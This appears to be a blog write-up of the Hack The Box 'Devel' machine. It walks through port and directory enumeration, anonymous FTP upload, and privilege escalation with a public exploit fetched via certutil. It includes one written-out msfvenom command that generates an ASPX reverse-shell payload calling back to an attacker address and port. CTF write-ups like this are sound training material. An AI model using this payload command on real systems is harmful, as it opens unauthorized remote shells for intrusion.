Persecure : my learning archive

, , , ,

HTB : Devel

Network Enumeration

To begin our exploration of the network, let’s initiate an nmap scan in order to identify open ports.

WEB Enumeration

Use gobuster to find for directories.

Cant find anything interesting in the directory enumeration.

Port 80

Seems like it is running the IIS7 server.

FTP Enumeration

From the nmap scan, we notice that we are able to gain access to FTP server anonymously.

The FTP server holds files and directories connecting to the test. Let’s try uploading a reverse shell to see if we can connect to it.

Initial SHELL

Use msfvenom to create a payload and upload it to the webserver.

  msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.18 LPORT=1234 -f aspx > reverse.aspx

Run the file and we get a shell.

System Enumeration

After some enumeration, I noticed the machine was outdated and has no patches.

We could easily use metasploit to find an exploit but I decided to search for the vulnerable OS exploit online.

Privilege Escalation

Searching online I came across an exploit from exploit DB that matches our criteria.

It comes with the compiling instructions.

I downloaded the exploit via searchsploit and compiled it.

I started a python webserver and downloaded the exploit via certutil.

Run the exploit and we get admin.

We can find the user and root flags in the desktop of the users.

Leave a Reply

Fill in your details below or click an icon to log in:

Gravatar
WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Cancel

Connecting to %s

Comments (

0

)

Create a website or blog at WordPress.com

%d bloggers like this: